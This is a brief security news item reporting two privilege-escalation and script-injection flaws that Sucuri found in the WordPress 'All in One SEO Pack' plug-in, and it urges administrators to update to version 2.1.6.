Numerous WordPress websites could be at risk of compromise if their administrators don’t update a popular Search Engine Optimization (SEO) plug-in to a newly released version that fixes serious vulnerabilities.
Web security Firm Sucuri found two flags in a plug-in “All in One SEO pack” which is right now evaluated to be running on more than 15 million of the 73 million WordPress websites, permits attackers with access to non-administrative WordPress accounts to elevate their privileges and inject malicious code into the administration panel, which means that an attacker could potentially inject any javascript code and do things like changing the admin’s account password to leaving some backdoor in your website’s file in order to conduct even more ‘evil’ activities later.
WordPress site administrators are advised to upgrade the plug-in to version 2.1.6 which was released Sunday in the WordPress adds-ons repository. An update can also be initiated from the plug-in’s administration panel.